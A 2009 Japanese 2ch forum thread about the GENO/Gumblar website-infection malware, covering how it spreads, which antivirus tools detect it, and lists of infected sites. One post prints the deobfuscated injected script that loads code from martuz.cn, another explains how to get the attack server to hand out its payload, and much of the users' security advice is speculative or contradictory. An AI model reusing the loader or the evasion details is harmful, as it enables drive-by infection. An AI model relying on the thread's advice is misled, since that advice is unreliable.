捨てようと思ったのにエラーになるわ

ノートンのファン回りっぱなし状態はどうにかならないの？

>>265

ゾンビのくせに走るのは画期的だったな。

>>267
先生ちゃんと仕事してるじゃん

せんせいは　やればできるこ

リカバリディスクが見つからなくてクリーンインストールできない、けれど仕事でＰＣを
使わざるを得ない場合はどうするのがいいんでしょうか。

>>261
opera使いの俺には関係ない話だ

>>263
【鑑定目的禁止】検出可否報告スレ10
http://pc11.2ch.net/test/read.cgi/sec/1235459712/

これかな？

>>275
仕事を辞める

>>266
(* >ω<)=3ﾌﾟｰ
そこらへんは全部いらないな

>>209
それはお前が見てるサイトだけだろ
ほかにもある

腐女子寝ないの？ｗ

>>280
もう触るなよ

>>275
取扱説明書に内部リカバリ手順が載ってるならそれで
駄目ならそのまま繋いで会社全体にウイルスばら撒いて責任問題に発展させる
自殺するなよ

小林製薬はCM流す暇合ったら注意喚起しろよ

CA使ってる自分は負け組

同人で大事になってるのは
子供や情弱がちゃんとわかってる人に話しかけられる環境があるからだよ。
普通のコミュニティでは子供は子供、情弱は情弱でまとまってるからそのまま気づかない。

>>277
難しくてよくわからねえ・・・　ありがとう

>>275
正直に上司に相談しろ　絶対会社のネットワークに繋ぐな

>>279
709 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/04/10(金) 00:13:27
ニコ動で動画再生するとCPU使用率が
50前後ぐらいいくんだけど元々、そんなもんかねぇ

コレお前？

仮想化してれば平気？

>>285
ペンタゴンの人？

ネットサーフィンしてたらAVASTが警告出してきたのですぐ閉じた
感染したかと思い再起動してからウィルスチェックしたら何も無し
普通に信用して開いてたら死んでたわ

スレから離れられなくて、うんこ漏れそう

>>289
それどこのスレの奴だよｗ

>>286
ああ、それっぽいな
普通なら感染も防げるし、
もしなっても自分で調べればわかるかな

>>293
ノートン先生で解決だ

ＸＰで管理者権限でネットやってる馬鹿が多いって笑えるね

制限者でネット繋げばウイルスソフトも要らないのにwww

もしニコニコとかが感染したら一気に広がりそうだなこれ

>>297
ウイルスソフトなんていらねえよｗｗ

まだ腐ヲチ・同人ヲチしてるやつはなんなの？自分が荒らしてることに気づかないの？

>>298
とっくにやられてたわけだが

513 名前：geno[sage] 投稿日：2009/05/16(土) 21:56:55 ID:GQnaax2E0
痛ニュとかの有名どころのコピペブログ感染してるな
ライブドアもか

>>296
垂れ流しちゃえ

>>296
先生万能すぐる

>>299
恒例の流れになってんなw

>283
内部リカバリーの存在をすっかり忘れていました！
マジで感謝です。

これってパーティションで区切ってあるDドライブの方はそのままでも大丈夫ですか？

サイトにウィルスコードを埋め込むってウィルスから取得したパスワードとかの
情報を使って第三者が改ざんするってこと？

ウイルスソフトって何？
バスターのことかい？

>>301
やられてたのはsaymoveの覗き見検索じゃないのか？
ニコニコ自体がやられてたら、それはそれでおもしろそうなんだが

東方ジャンルが死んだのはめでたい

javaオフでも感染する場合があるんだっけ？
もうフラフラできんな
2chブラウザで2chしか見れなくなりそう

>>306
やるだけやってみて駄目なら諦めたら？

>>307
FTPで接続したときパスとかバレて第三者に云々

パケモン感染しねえかな

野球やろーぜ

エロマンガサイトで感染したのって出た？

>>302
釣り乙

野球ch感染してるんじゃね？

>>316
またエロマンガ見てる・・・

そりゃウイルス作者だって書き込めるんだしチェックは絶対してるんだろうから
荒らしもするんじゃない？

>>164
正規サイトに感染広がる：新手のWebベースマルウェアが急拡大 - ITmedia エンタープライズ
http://www.itmedia.co.jp/enterprise/articles/0905/15/news032.html

これもGENOウィルスかな。

>>286
同人関係はネット上で規模のあるコミュニティを形成してるから
情報が伝わりやすいってのがあるんじゃないか？絶対数の差もあるんだろうけど。

いかにも一般人な人がやってるサイトだとそういう情報って伝播しにくいだろうな。
ここですらよく判ってない奴多すぎだし、IT情報に疎い種類の連中は大変だ。

壺に入ってたら大騒ぎだろうな

>>221
>>1のサイトとリンク先を参考にした現在の感染サイト
スレで報告あったサイト含む
漏れがあったらレスよろ

p-frying■com/
www■zengozen■co■jp/pic/keturosyumire-syonn■htm
skyhighpremium■com/
sound■jp/yudai_marimba/
www■thesis-report■com/
www■joyjoynet■com/
www■ti-a-ra■com/
www1■odn■ne■jp/revue1999/
www■nifty-hair■com/
www■k-q-bury■com/
expss■main■jp/expss2/2005/01/
www■livmail■com/

同人・ヲタ系以外で感染してる有名サイトってどこなんだ？

>>313
そうゆうことかありがとう、じゃあ自分のブログはFTP接続じゃないから大丈夫だな。

うぜええ

>>324
www■senlights■co■jp/seihin/kirenaru-1s■htm

俺はここから感染してるっぽい

>>298
2chと関わりのあるBIG-server.comが感染してた事例もあるからなあ
ニコ動も無縁ではないかも

【BIG-server.com】maido3.comがウイルスにより改竄、ウイルススキャンのお願いとお詫び[05/11]
http://gimpo.2ch.net/test/read.cgi/owabiplus/1242055283/

ふたば感染してるって全板感染してるの？

ウィルス、命名されたか。(多分)海外での感染源は、トラフィックの多いアダルトサイトか。
しかし、検出可否スレでも新種が見つかっているようだな・・・。

ふたばはガセじゃなかったか

74 ヤマボウシ(dion軍) [sage] 2009/05/16(土) 22:01:12.03 ID:qgx0kH7v
【特徴】
・亜種大杉　セキュリティソフトが対応しきれていない
　症状もまちまちでいまいち決定打が無い
・ftpを介して感染者のサイトをゾンビ化
・トラフィックが監視されてるから、ID・Passやクレカ番号が筒抜け
　Botnet汚染や、キャプチャ画像の送信の疑いと言う情報もあり
・クリーンインストールが唯一の対処法
・キンタマなどとは違い感染源が明確なので、
　感染源の企業などから圧力がかかってしまう。よってマスコミの報道も消極的

ソースチェッカーでなにも出ない場合は少しは安心してもいいんですかね

>>334
ユーザーエージェントみてるからSCOでも変えないとでない

ニュースサイトどっか取り上げてないのん

>>311
何度も出てるけどJavaScriptな

さっきエクスプローラーが異常終了してびびった。
cmdもregeditも起動するしsqlsodbc.chmも問題なかった。
怖いからwin7beta使うことにする。

avastでスキャンする場合圧縮ファイルもやったほうがいいの？

>>334
ソースの内容まで見ろよ
安全度100％でも感染してる

2chが感染したら日本終わるな

信じられるのは自分だけだってばっちゃが言ってた

>>294
714 名前：709[sage] 投稿日：2009/04/10(金) 00:33:30
>>713
>>709は私だ（* >ω<)=3ﾌﾟｰ

GENOウイルススレ　「1」だｗ

>>328
martuz.cnに飛ばされるね。
比較的最近感染したサイトのかもしれない。

>>344
へえそうなんだ　怖くて開けられないけど
親父がIE7でそこ閲覧した時に感染したっぽい

クリーンインスコしてもFTPのパス変えないと意味ないってさ
また改竄されるらしい

>>326
FTPだけじゃないです

知ってるから

ホラー映画作れそう

DLsite.comだけは
感染しませんように( -人-)

>>324
Firefoxでアクセスしてみたけど全部
martuz■cn/vid/?id=
からファイルを取ろうとするね。それでそこに直接行っても
// No news...
と表示されるだけ。。IEじゃないとだめか・・

なんか話通じない人いるよね

>>347
FTPて何だか教えて下さい

巨大ボットネット発見，190万台の感染マシンで構成
http://itpro.nikkeibp.co.jp/article/NEWS/20090423/329035/

よく分からんけど
.cnを全部弾いたらおｋ？

スレの最初に書いてる以外の方法で感染確認する方法はない？

>>353
知らないなら気にしなくて良い

>>318　なん実Ｊにも広がってるなｗ
ttp://baseball.fan-site.net/uhyo/tan/img/2694.jpg

ひどい広がり様

>>328
unescapeしてみたよ
martuz.cn だってさ
ホームページトップからして改ざんされとった

こりゃパターンマッチむずいな...
src=//mar"+"tux.cn/vid
とかなってた。連結の位置ずらしただけでマッチしないよねぇ

662 名前：GENO　報告　[sage]　投稿日：2009/05/16(土) 22:37:44 ID:5Y6mJ8vc0
　商業乙女ゲー（PC)のリボンマジック公式サイト
　アクセスしようとするとGoogleにブロックされて下記のメッセージ

　>不正なソフトウェアは gumblar.cn/ を含む 1 個のドメインでホストされています。

他人に感染させる経路はＦＴＰだけ？
フラッシュメモリからなら感染したＰＣからデータ受け取っても大丈夫？

>>354
さらに強まったのが出てきそうだな

>>361
また公式サイトが

>>344
4/29の正午ぐらいに閲覧した時に感染したかもしれん
GENOの初出はいつだっけ

感染してないけど何か不安だな
サイト一旦閉じて沈静化待つべきか

しかし何でこんな急速に広まったんだ
もう下火ってイメージだったのに

GENOはhostsで禁止してるからもう2度と見たい

腐女子が騒いだ

なんか具体的な情報が今一つ分からんな。
Javascriptは只のダウンローダで、Adobe Reader、Flash Playerの脆弱性を突いて勝手にダウンロードするとかいう仕組み？
最近のサイト改ざんはMS鯖の脆弱性を突いてるのが多いが、同人サイトみたいなのがやられてるってのは、今回のは違うっぽいのか。

ニコ動とpixivと２ｃｈにかまけて自サイトずっと放置してて良かった

>>368
どっちだよｗ

>>367
GENOの対応
小遣いサイトや小林製薬など中年層が感染して気付かず放置

>>367
同人版の奴らが調べだしたから

>>370
そうだけど、ftpからの改竄は別物だよ

>>365
GENOで感染、で騒がれ始めたのは確か4月5日あたり

実際には3月28日頃からポツポツとあったらしい

初期に感染してた奴らは何見て感染したんだか

GENO

>>365
326 名前：名無しさん[sage] 投稿日：2009/04/04(土) 10:43:40 0
GENOのHPにアクセスしようとしたら、Acrobat Plug-in が起動して
This operation is not allowed. と表示する。
２台試して、2台とも起きた。
もしかしてウィルスに感染してる？

これが最初

GENO先生

>>379
それ違う
深夜3時くらいのがあったはず

>>370
傍受したFTP接続情報を元に普通に接続して改ざんするからね。
サーバーのOSは関係無いよ。
逆に言えば感染後にFTPで通信していなければ、FTP接続情報は漏れない。

GENOがもっとウィルスについて説明していれば良かったのに

>>368
はっきりしなさい！

>>376
あーほんとだ
最近なんだ　ありがとう

GENOのキャッシュ消せばダイジョブって説明を鵜呑みにしてました！＞＜；

いいから黙ってキャッシュ消せよ

avast使ってれば問題ないってことか？

GENO体質

林明美のHP踏むとavast反応するらしいけどアドレスが分からぬ

俺は今日はじめて知ったけど、けっこう前から出回ってたんだね。
じゃあ、なぜ俺様の購入した優秀なノートン様が未対応なんだ？
それとも闘ってくれてるのか？

もう感染報告から一カ月以上たつのに
いまだに対策されてないサイトがこんなにあるんだな

>>375 >>382　ありがﾄﾝ
感染後にFTPのパスを盗むんだな。その後鯖に勝手にアクセスしてソース改ざんかｗ　凝ってるなあ。
仮にこのパターンばっかりだったらFTPへのアクセスログでも見とけば良いのか。
最近のウィルスはチェックソフトで見つからない奴が多くて怖いよ・・・。

Avastのサイトでウイルスクリーナーダウンロードしてみたんだけど
いざ検索を開始すると「ファイルが検索できません！」て表示が出る
なぜ？？

>>391
ノートンは今俺の膝枕で寝ている

GENOギアス

cmd.exeでsqlsodbc.chmの容量確認したら0になってた
おかしいと思いつづ直接探しにいったら見つけられない、ファイル消えてる臭い
1時間前までは普通に確認できたんだけど何なんだろうなこれ。カスペルは問題なく当てられる
カスペルで変なもん引っかかったら報告しに来るよ

ＦＴＰ以外で感染するかわかる人、いませんかー？

ところで、今のところ感染経路はAdobeのPDFかFlashの脆弱性をついたバイナリ実行によるものと認識しているんだが、
今感染してる連中ってのは、4月初めのGENO騒動のときに、FlashもReaderもUpdateしてなかった連中ってことか？

それとも何か別の感染経路があるのか？

GENOが潰れるなりしてくれたら
気分的にはすっきりするんだけどなあ

同人板のスレってアニメキャラ板とかのスレにも貼られてるんだな。
道理で馬鹿の他に初心者以下のｶｽがいるはずだ

>>324を検知するアンチウイルスソフトまとめて

>>351
ほんとだ…
以前チェックした時はgumblar.cnを読み込んでるサイトがほとんどだったんだが
恐らくリモートから攻撃コードを更新されたんだと思う

ちなみに直接ロケーションバーにmartuz■cn〜を打ち込んでも
攻撃コードはダウンロードされないよ。
攻撃サーバはUA、IPアドレス、cookie、リファラを駆使して解析から逃れようと試みる。
攻撃コードをダウンロードするには

・ロケーションバーにURLを打ち込んでアクセスするのではなく、感染サイトからアクセスする。またはリファラを偽装する
・cookieを拒否する
・XP以下のWindowsでアクセスする。またはUAを偽装する
・もし以前に攻撃サイトにアクセスしたことがあり、その際「XP以下のWindows以外」でアクセスしていた場合はIPアドレスを変える

以上の条件を満たすことが必要

FC2でサイト作ってる人はどうなんだろうかね（´・ω・｀）

>>397
気になる
検索終わったら頼むな

ジーノってなんなの？
昔やったマリオRPGのイメージしか思い出せん

>>390
http://replica08.web.fc2.com/index.html
多分これじゃないか

>>391
ノートン先生は俺のをなめてるよ

>>399
前者。だが前とはコードも飛ばし先も変わってる。

いつも仮想PC上からサイト更新してるんだけど、もしホストPCが感染していたら
仮想PCからのFTPも危険？

9.11でもダメって聞いたけどデマなの？

XPgenocideウイルスだなこりゃ

>>410
アウト

リーダーは削除した方がいい

>>410
多くの場合セーフ

>>413
ありがと、しばらく更新見送る

>>410
ホストならアウト

>>410
え？じゃあ単純にアップデートしてないからこうなったの？
もっとも亜種が広がればどうなるかは知らないが、拡散したやつはそこを突いてるやつだったわけか？

>>414
脆弱性のアップ来てるから削除する必要なし

>>410
セーフ

アドビリーダーって消して大丈夫なのか

×>>410　○>>409　ごめん安価間違えた

>>388
いいえ

>>410
セフト

FlashもReaderもアップデートしてない人が多いんじゃない
してなくても余程古くない限りそれといった支障ないし

>>421
PDF読むのならもっと良いソフトもあるから

いらないっちゃいらない
いるっちゃいる

>>409
�d、つまりサイト閲覧者の立場から見た場合、4月騒動の時点で感染経路を塞ごうと思えばいくらでも塞げたって事だな

あ、セーフっぽいのか
どちらにしろしばらく控えるけど

>>425
6.0からアップデートしてなかった。
慌ててやったよ。

リーダーが対応したのは何日か前の更新じゃないの？

>>398
いまのところそういうのはない
別のウイルスに感染してなきゃ大丈夫じゃね
ただし今のところなだけで今後どうなるかは不明

>>431
それとは別

もし感染したらってはなしなんだけど
自分が作成したHPみたらavastは警告出す？

>>428
adobeがセキュリティー対応したのは昨日か一昨日ぐらいじゃなかったか？

GENOウイルスに感染したclientがftp使われてjsうｐするわけじゃないから

>>434
やつは進化するから確信はないだろ

>>426
pdfってAdobe以外でも読めたの！？

>>437
今のところはわかるってことですか？

>>435
それとは別です

>>438
情報弱者ってかわいそうだな

>>435
いや、もっと前に脆弱性の更新はあったよ
最近のはまた別

>>407
うちのAviraたんは反応してくれないがちゃんと攻撃コードは埋め込まれてるね
ttp://www.dotup.org/uploda/www.dotup.org34438.png

質問きたら
「亜種が出てくるかもしれないからそれはわからん」って感じのレスしかできないよね

（１）感染してるサイトを閲覧する
（２）自分のパソコンが感染する
（３）その状態でFTPで自分のサイトを更新する
（４）その時にFTPのIDとパスを抜かれる
（５）ウイルスが勝手にHTML、ｐｈｐファイル等に不正なジャバスクリプトを埋め込む
（６）サイトが感染状態になる。
（７）そのサイトを見た人が感染する

1) どっかの感染している index.html やら index.php やらを持ったサイトを、
自分のサイトのコンテンツを FTP で更新する担当の人がアクセスする
2) 担当の人の PC にトロイが侵入する

3) 2) で侵入したトロイは、担当の人が FTP で
自分のサイトにアクセスするのを待ち続ける
4) 担当の人が感染した PC から FTP で自分のサイトを更新すると、
トロイがその様子をチェックしていて、そのサイトにアクセスした
ログイン名とパスワードを盗み取る

5) トロイはしばらくすると自動的に、4) で盗んだパスワードを使って
そのサイトにアクセスし、index.html やら index.php やらをこっそり書き換えて、
そのサイトに感染コードを仕込む
5') もしうまく作ってあるトロイなら、ローカルの PC にある
自分のサイトに上げるためのファイルのローカルコピーにも、
同じ感染コードを仕込むだろう。

6) 1) に戻る

.cnドメイン全部塞いでればまだマシなのかもしれんな

スレざっと見た感じだと
Adobe製品さえ一切使わなければ感染は絶対にしないのか？

>>443
俺もavira
反応しないねぇ
javascriptOffだとだめみたい

Onにして配布元のpdfやらフラッシュをgetするところまでいくと
反応するんだろうか

ってかcnとkrを全ブロックてすごいなあんたｗ

http://www.i-like-movie.com/
感染してる

>>443
敵もavastやchromeなどで対策を講じているようだ
もうノートンやバスタークラスでは検知できないな

自分のサイトが感染してるかどうかはソース見たらわかるんだよね？

>>17
�Aを試して50,727バイトだった安心していいよな？

でも亜種多すぎてもう訳ワカンネ
cmd.exe開けても感染してるくらいだから、�Aも既に破られてんじゃね

>>449
してるなら踏ませないようにしろよ

>>444
現時点で既存亜種含めたウイルスの挙動を完全に解析した奴はいないっぽいからな。
突然HDD全消去するとかなにかの隠し機能がまだあるかもしれない。

>>447
使ってなくても古いのがインストールされてれば危ない
FlashPlayerなしっていうのはあんまりない状況だと思う

>>449
マジか？！
ここ閲覧者莫大じゃないの？

まぁ今の現状を見て書き込みすりゃいいよ
未来のことなんてわからんし

ごめん、嘘ぴょん

なんで感染してるのを貼るんだ

キーロガー使って個人情報を収集して送信するようなウィルスでもHDDを全部飛ばしたりするのか？

>>458
市ね

>>452
更新日時が今年の３月以降ならアウトという話も聞いた

*http://.*\(cn|kr)/.*$/

採用

こんな状況で嘘はやめろよな、情報信じれなくなるじゃんか

>>460
ウイルス作ってる奴の気まぐれでそういうやり方に切り替えたりするかもね。
続々と亜種が出てるなら複数人でやってる可能性もあるし、
その中に紛れてる協調性の無い馬鹿がやらかしたりするかも・

Adobe Flashなんたらを消せばいいの？

>>449
C:\にアクセスするimg要素が有るけど感染してないのかなんだ。

>>462
五年前だ
よかった

大問題だと思うんだがまったく報道されてないのはなぜよ

>>451
多分
今の状態で言うと

>>466
いい加減巣に帰れよ

>>466
アップデートすれば良いだけだ

フレッツウイルスクリアさんは何もしてくれないのか

巣に帰れとかいい加減お前がうぜーよ

UAをVISTAのバージョンにしたら回避できる？

これって、ウィジェット経由でも感染するの？

Flashとかいらないんじゃない？
無駄に凝ってて面倒臭いサイトが増えていくだけだわ

Mozilla Firefox
opera

使えば何て事は無いのに・・・。

>>463
/^http://.*\.(cn|kr)/.*$/
ね

>>458
風雪のルルで逮捕

ブラウザ関係なくね？

疑心暗鬼になってしまうな

>>460
最近はビジネス目的だからそういうのは少ない

>>462
日時についてはあてにならないです

>>481
少なくとも俺のFirefoxではPDFを持ってきてくれなかった

firefoxならgoogleに報告あがればブロックしてくれるな
operaだとリボンマジックそのまま開けたぞおい・・

わかりやすい症状が出るとすぐ対策されるんで、症状が違ったりわかりにくくなったりしてる亜種が現れてるってことか。
>>1とかのまとめも見直す必要があるんだろうか？

>>481
狐は確実に刎ねるよ

gumblar.cn タイムアウトが戻る
なんでだろ まあいいことだけどｗ

>>474
おねがいですから帰ってください

>>488
なんでそうなるんだ？理由がよくわからん

>>487
変化し過ぎて対応できるのだろうか？

>>479
ton

狐が刎ねるってより対象がIE

>>481
スクリプトがIE以外はねてた
最新のスクリプトがそうかはわからんけど
今後変わるかもしれないしどれが安全とかはあんまりないとおもう

相手するな
そいつに日本語は通じない

>>491
火狐はgoogleの攻撃サイトDBを読み込んでるから

毎度書き込まれるけど「確実」とか「大丈夫」とかないって

>>494-495
なるほど。ありがとう。
一応狐使いだが油断しないようにしておく。

>>491
ttp://www.dotup.org/uploda/www.dotup.org34535.png
”今のところは”大丈夫だがな

Sleipnirから火狐にするのがめんどくせええ

ブラウザ選ぶぐらいで安全になるようなウィルスなら脅威ではない。

市販のアンチウイルスソフトいれてるから大丈夫だよね？

>>498
ＶＢ入ってれば確実に大丈夫だ

>>503
エラーでも起こしてるのかｗ

>>504
そうで無くなってきた。

>>503
バスターなら安心

カスペルスキャン中暇なんでログ漁ってたら俺と似た人がいた
ただこれと違ってちゃんとカスペルが動く
更新日時確認したら2009/05/16　21:56とかなり最近、その頃PCの再起動をかけてたと思う
>>1の病状は無し。おまいらPCの再起動をかけてcmd.exeで調べてみてくれないか？


63 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/16(土) 05:22:44
cmd.exeで実行してdir C:\WINDOWS\system32\sqlsodbc.chmでエンター押したら
ファイルが見つかりませんって出たんだけどこれはアウト？
さっきまで1個のファイル　50,727バイトって表示されてたんだけど、
まとめサイトにのってるニフティのサイト開いてKasperskyもダウンロードしたあと試したらこうなった

72 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/16(土) 05:30:24
>>65>>66
開けてるけど1個のファイル　50,727バイトって出ないとアウトなんじゃないの
でもsqlsodbc.chmプロパティ開いてみたら50,727バイトなってた。
これはセーフなのかアウトなのか・・・

78 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/16(土) 05:38:00
>>74
カスパーインストールしようとすると「インストールノログを開くときにエラーが発生しました。
指定されたファイルの場所が存在し、書き込み可能であることを確認してください」って出てしまう

>>503
ウィルスセキュリティゼロですか＾＾

>>509
ウィルスセキュリティゼロだとだめなんでうｓか

あぁ、最初からIEのみを攻撃対象にしてたのか
なるほど

とりあえずSophosに乗り換えてみた
これで安心…なのか？

ノートン大先生がクッキーに反応したぜ
やれば出来るじゃないか。安心安心

>>501
同意

ノートン先生・・・・・・・・

>>503
市販のソフトはドンドン無効化しているな

確実に大丈夫なのは

Mozilla Firefox＋ウイルスバスター

>>514
めんどくさいよな

こっちが胃もたれするくらいのアンチIE論者で火狐使いの知人が感染してたから、
「火狐だから大丈夫」なんて、とてもじゃないけど思えない

バスターさん対応するようになったのか？
昨日まで無意味だとか言われてたように思うんだけど

サイト見なければ大丈夫だろ

俺のノートン先生は今どこに・・・？

>>510
ウイルスに対するセキュリティがゼロだから

>>492
セキュリティ会社が有効な対策を出すまでは、
感染した可能性があったら再インストール、に絞っちゃった方がよかったりして。

予防に関してはこれまで通りでよさそうだけど。

>>521
そういうあなたにラブレター。

>>519
それ本当？

>>522
もう夜も遅いからな
俺が腕枕してやったら寝ちゃったよ

同人板のやつ等がウイルスの挙動研究しててソレがまったくの的外れでワロタ

ブラウザ云々以前にネサフしなきゃ問題ないだろ

テンプレが危機感感じてここに来た人向けじゃないのが問題だわ

要するに

FlashPlayerとAcrobat Readerを最新にしとけばいいだけ。

セキュ板ってコミュ弱人間多すぎか長文でしか説明できない馬鹿ばかりだねぇ

　

　

linuxならアクセスしても大丈夫だよね？今のところは
サブ機がubuntuなんだ

なんかアレな情報が流れてるな…
スクリプトはIEとそれ以外で別のコードを返すけど
Firefoxも普通に攻撃対象に入ってる

>>520
どうせ最新亜種には追いつけないんじゃね？

集団ヒステリーっぷりが滑稽だな

フォクすけ使いだけど
亜種が出まくってるこの現状で絶対安心とかは有り得ないと思うが

>>520
設定変更で昨日まで使えていた
今は使えない

>>518
だよなー
火狐ってめんどくさそうなイメージがある
オペラにしようかな

同人サイトに感染してる事を運営に通報したら消えた！！

よし！　被害者を無くそう！

u.batを検知できないの？こいつを検知できれば万が一感染しても大丈夫なんじゃね？

WIN2Kにsqlsodbc.chmがあって
サイズが
サイズ　　　　　　　　45.0 KB (46133 バイト)
ディスク場のサイズ　　48.0 KB (49152 バイト)

だったんだがこれは感染してるって事でいいんだよね。
一応コマンドプロンプトやレジエディは立ち上がるけど
ウイルスソフトの更新　・Kaspersky とニフティオンラインスキャン
は見事に失敗したし

IEなんてここ一年くらい使った事無かったのに
OPERA使いでもくらうのか　このウイルス　最悪

>>530
クマー

gumblar.cnに田代砲撃ち込むってのは？

>>538
そして全てのサイトが消失するorz

過去最強なのかなぁ、このウイルス

>>530
このスレの1の最初のほう見たか？
長文で騒いでるのは駆け込んできたやつらだろう

>>540
オペラもだめか・・・
やっぱり火狐に鞍替えすべきなのかな

94.229.65.160/27の範囲を教えてくださいまし。

>>532
jscript.dllのバージョンチェックが入ってるから、実質的にIE7以下しか
攻撃対象になっていないように思うんだが、Firefoxが対象になってる
スクリプトが埋め込まれているサイトがあったら教えて。踏みに行くから。

もうこんなウイルスだらけのネットに居られるか！
俺は専ブラに戻るからな！

>>540
たぶんビンゴだと思うけど、そのファイルをダブルクリックするとどうなる？
本来ならヘルプファイルが開くはずなんだが。

某乙女ゲーサイトにアクセスした
ソース見て、改行されてない横に長くて、なんか&だか#の多い部分が危ないスクリプト？

>>542
ガトリング漢砲ってのがあったな

>>546
アドビ更新すれば良いだけなんだけどな〜。

ちょろめはどうかね

単にIEとFirefoxで挙動が違うだけで
Firefoxも食らうんじゃね

>>544
この程度が過去最強だと？

>>526

本当。
オンラインスキャンでアウト判定でたらしい。
まぁ他のＰＣセキュリティ環境がいまいち分からないから
これ以上はなんとも。

>>500
セキュリティ設定で
攻撃/偽装サイトとして報告されているサイトを表示するときに報告する
がonになってたときだけな

>>542
何万台ものサーバーやソンビー・クライアントをコントロールできる敵に立ち向かうのか？
返り討ちにあうぞ

NIMDA知らんのか
あれはやばかった

山田とか苺きんたまとかそういうレベルでおもしろい奴くればいいのに
腐女子のデスクトップ丸見え

>>557
ＩＥプラグイン入れてたんだろ。

Macなら大丈夫
この際だからお前ら全員乗り換えろ

>>550
開いていいものなのか？
まあもうどうせ待避させてフォーマットしかないからどっちでも同じだろうけど

>>558
それはあえて切らない限りはチェック入ってると思うけどな

>>553
もうやってる
でも心配なんだよ

アップル大勝利

>>563
乗り換えると今度はMacが標的になるんですね、わかります

>>564
たしかに言われてみればそうだな、やめといたほうがいいかもしれない

>>563
　 .ﾊ,,ﾊ
　( ﾟωﾟ )

firefoxでも感染しますたorz
pdfファイルいくつか開けたからか？
これから再インスコしてきますorz

GENOのサーバーMacだけど感染したぞｗ

>>558
涙拭けよ

火狐使い勝手悪い…でも我慢

442 名前： スカシタゴボウ(アラバマ州)[sage] 投稿日：2009年05月16日(土) 23:32:11.00 ID:hgwQOSJu
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) にUserAgent変えたら感染しないってマジ？

>>566
FlashもReaderも削除しろｗこれなら完璧だ

>>556
相手がadobeの脆弱性を狙ってやっているが
他の脆弱性を隠し持ってないとも限らない
いつ何時その攻撃手法に変えるかわからない

>>572
食らったWinマシンが更新して改ざんしちゃったんだろ？

ああ、そういやFirefoxでもIE Tabとか入れてたら
IEエンジンで読み込む場合があるな

ﾇﾙﾎﾟ

デフォルトなら火狐が一番危ないよ
先読みするから

IEコンポでUAをFirefoxにしたらどうなるん？

>>555
いや、いろいろスクリプト見たけど、ScriptEngineのバージョンチェックしてて、
対象をIE7以下のjscript.dllに絞ってるのしか見たことないんだよね。

Firefoxを対象にしているスクリプトがあるのなら、そのスクリプトを
拾いたいんだけど、見つからない。

昼から何か進化した？

FlashもReaderも削除したけどまだ不安だ
FlashもReaderも使わない亜種が出てくるかもしれない

>>548
どれも同じだよ。>>324
確かにjscript.dllのバージョンチェックが入ってるんだけど、
これはobjectタグで返すかembedタグで返すかを判別するだけのコードのように思う。

>>526
まーAdobeReaderはFirefoxからも開けるから関係ないんじゃね？
そもそもブラウザを直接狙うんじゃなくてそこから呼び出したAdobeReaderを使って感染してるみたいだし。

まさかFirefox使っておいてNoScript使ってなかったのかね

http://www.trendmicro.com/vinfo/images/DOWNAD_AD/AD_01.jpg
　ワームは、UTC （協定世界時）に基づき、250のランダムなWebサイトを含むURLのリストを毎日作成します。
例えば、算定された文字列が "abcdef" の場合、ワームは、この文字列の末尾に、".biz" や
".inf" や ".org" や ".net" や ".com" の文字列を追加します。これにより、
URLは、"abcdef.biz" や "abcdef.info" や "abcdef.org" や "abcdef.net" や "abcdef.com" となります。


これはひどいｗｗｗ

>>581
エンジンが違うから火狐は大丈夫と何度云えば・・・。

>>551
<body>タグの直前だったら可能性が高い。
でもスパム対策でメアドとかを難読化してるサイトもあるから
その情報だけでは何とも言えん。

>>571
サイト教えて。

最新のADOBIでも危ないと聞いたんだがマジ？

ウイルス感染サイトにウイルスとは別のスクリプト埋め込んで
サイトにアクセスしたPCをランダムにtelnet飛ばして感染拡大とか

ありえないか

>>571
おいサイトくらい晒してけ
何のためにこのスレいんだよ

>>577
アホかｗ他のところ付いてきてから言えよｗ

>>593
日本語で話せよ

> pdfファイルいくつか開けたからか？

本人も特定できてないんじゃないのか

>>589
油断してんじゃねーよカス
インフルエンザだって変化したんだよ

Gecko系ブラウザは大丈夫って事？

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;

if(
　　　(u.indexOf("Chrome")<0)&&
　　　(u.indexOf("Win")>0)&&
　　　(u.indexOf("NT 6")<0)&&
　　　(document.cookie.indexOf("miek=1")<0)&&
　　　(typeof(zrvzts)!=typeof("A"))
){
　　　zrvzts="A";
　　　eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
　　　document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>");
}

埋め込まれたJavaScript攻撃コードを読みやすくした奴がこれな

だー、寝れない
だれか絶対に感染しない方法を確立してくれよ

>>601
ネットに繋げない
これマジ最強

>>601

PCをネットに接続しない。

>>601
http://ja.wikipedia.org/wiki/Lynx_(%E3%82%A6%E3%82%A7%E3%83%96%E3%83%96%E3%83%A9%E3%82%A6%E3%82%B6)

>>595
ｗｗｗ　（これはワラでなくワールドワイドウェブだｗｗｗ）

>>563
安全だって言われても
MacにするとYahoo MovieやBiglobeの動画見られなくなるもん

もうこれでいいんじゃないか？
症状を挙げといても該当しなけりゃ安心ってわけじゃないし。

予防：
Flash PlayerとAdobe Readerを最新版にする。
Adobe ReaderでJavaScriptを無効にする。
可能であればブラウザでもJavaScriptを無効にする。

感染の確認と対策：
複数の亜種が存在し、感染後にどのような症状が現れるかはわからない。
感染した可能性があれば再インストール推奨。

当分自宅のPCはメールチェックと2ｃｈしか見ない

まだ不確かな材料出していきがってる奴がいるのか

adobe夕方アップデートしたけど又来てるよ

みんなもチェックすると良いよ

Linuxなら兵器だよな？

常々申し上げているとおり
FireFoxが安全なのは標的にならなかったからです。
他に安全な理由は一切ありません。

Flash PlayerとAdobe Readerの最新版って今どれ？

>>601
ネットカフェいけば感染し放題だぜ！
家電量販店でもいいぜ！

>>612
ブロックしてくれるのもFirefoxだけだがな

>>600
これだと、ChromeとNT 6以上を除外してるだけだな。
Firefoxも対象だ。

正直OPERAがダメだったのに狐だけが安全って気はしないんだけどどうなんだろ
今はPS3からなんでコレはいくらなんでも安全だろうがな

PDF開けんからなw
2kだといろいろあって再インスコが気が遠くなるな
不愉快だがビスタ買おうかしら

>>600
Chromeは感染対象から外れてたのか

>>615
え？

>>610
flash playerのほうか？

Google Chromeは？

>>617
